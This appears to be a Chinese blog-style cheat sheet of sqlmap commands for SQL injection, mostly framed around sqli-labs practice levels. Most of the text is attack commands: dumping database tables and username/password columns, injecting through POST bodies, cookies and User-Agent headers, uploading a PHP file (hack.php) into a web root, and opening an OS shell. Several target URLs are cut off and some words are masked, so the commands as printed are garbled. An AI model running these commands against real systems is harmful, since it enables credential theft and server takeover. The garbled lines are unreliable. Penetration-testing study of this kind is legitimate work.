sqlmap常用總結

sqlmap --help 檢視幫助

sqlmap支援的注入方式

-u 檢測url是否有注入點

sqlmap -u 「

無損測試，並且列出一些測試例子

-u的測試

–dbs 獲取所有的資料庫

sqlmap -u 「 --dbs

–current-db 獲取當前所使用的資料庫

sqlmap -u 「 --current-db

-d 指定所測試的資料庫

–tables 獲取該資料庫中所有的**

sqlmap -u 「 -d 「security」 --tables

-t 指定所測試的**名

–columns 獲取該**中所有的欄位名

sqlmap -u 「 -d 「security」 -t 「users」 --columns

-c 指定所需要的欄位名稱

–dump 獲取特定欄位的所有資料

sqlmap -u 「 -d 「security」 -t 「users」 -c 「username,password」 --dump

2.post方法的注入

首先使用brupsuite抓post包，把抓取的結果放入乙個檔案中

sqlmap -r post.txt

後續步驟同get方法

3.cookie 的注入

–cookie 指定cookie中使用的引數

–level 要使用cookie注入sqlmap要執行在level 2

sqlmap -u 「 --cookie 「uname=admin」–level 2

執行級別需要level 2

後續步驟同get方法

4.使用sql來寫入檔案

–is-dba 測試當前使用者是不是資料庫管理員

sqlmap -u 「 --is-dba

–file-write= 上傳原始檔的絕對路徑

–file-dest= 上傳檔案的目標路徑

sqlmap -u 「 --file-write=/root/hack.php --file-dest=c:/phpstudy_pro/www/less-1/hack.php

不過，建議通過hackbar去寫入，因為sqlmap寫入似乎只能針對簡單情況的寫入，如sqli-lab中的level1，但是level7就不可以，而hackbar可以。

5.直接執行命令

–os-cmd= 執行作業系統的命令必須有資料庫管理員許可權，必須在**目錄下

sqlmap -u 「 --os-cmd=ipconfig

–os-shell 獲取作業系統的shell

sqlmap -u 「 --os-shell

以上均要求在**目錄下，且同樣只適用於簡單的注入測試【即只含單引號那種】

要求在**目錄下

–time-sec(秒)：當使用時間盲注時，時刻使用–time-sec引數設定延時時間，預設是5秒。

–union-cols：預設情況下sqlmap測試union查詢注入會測試1-10個字段數，當–level為5的時候他會增加測試到50個字段數。設定–union-cols的值應該是一段整數，如：12-16，是測試12-16個字段數。

設定union查詢使用的字元

常用sqlmap -u 「 --threads=10 --dbms=mysql --batch --technique u -d sqli --tables

sqlmap -u 「 --data --threads=10 --batch -p user-agent --technique u --user-agent=-2 -d sqli -t wzxjypujxc --dump

【這是對於http頭部注入常用的，因為http頭部注入需要指定post方式，所以這裡如果-u，則加上–data就相當於以post方式請求，-p則指定請求位置，不可以就嘗試加上–level、–risk；

還有，user-agent的注入有點特殊，建議指定–user-agent=-2類似的形式，然後再嘗試注入，其實http頭部的注入都建議這樣】

注意-r **txt的方式一定要為post，否則會出錯，所以需要將get請求改為post請求，才可以正常注入

sqlmap常用總結1

sqlmap常用總結

sqlmap常用引數總結

SQLmap常用引數

SQLMap常用教程

sqlmap常用總結

sqlmap常用引數總結

SQLmap常用引數

SQLMap常用教程

相關推薦